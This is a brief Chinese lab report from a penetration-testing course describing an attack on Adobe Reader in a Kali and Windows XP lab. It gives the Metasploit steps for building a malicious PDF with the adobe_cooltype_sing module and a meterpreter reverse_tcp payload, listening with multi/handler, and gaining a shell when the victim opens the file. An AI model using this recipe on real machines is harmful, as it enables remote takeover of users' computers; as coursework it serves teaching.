20145211《网络渗透》Adobe阅读器渗透攻击

20145211《网络渗透》Adobe阅读器渗透攻击

实验准备

1、用了一个kali，一个English Winxp3，并保证能相互ping通

2、开启显示隐藏文件

实验步骤：

1、开启msfconsole。

2、使用漏洞use exploit/windows/fileformat/adobe_cooltype_sing，进入该漏洞模块的使用。

3、使用攻击载荷 windows/meterpreter/reverse_tcp设置攻击有效载荷。

4、查看参数，并配置，生成hzy.pdf,将pdf复制到靶机里。

 

5、back出当前模块，并使用use exploit/multi/handler新建一个监听模块。

6、使用set payload windws/meterpreter/reverse_tcp建立一个反向连接。配置的参数与先前保持一致。

7、使用命令exploit开始攻击，在xp中打开pdf，成功获取shell。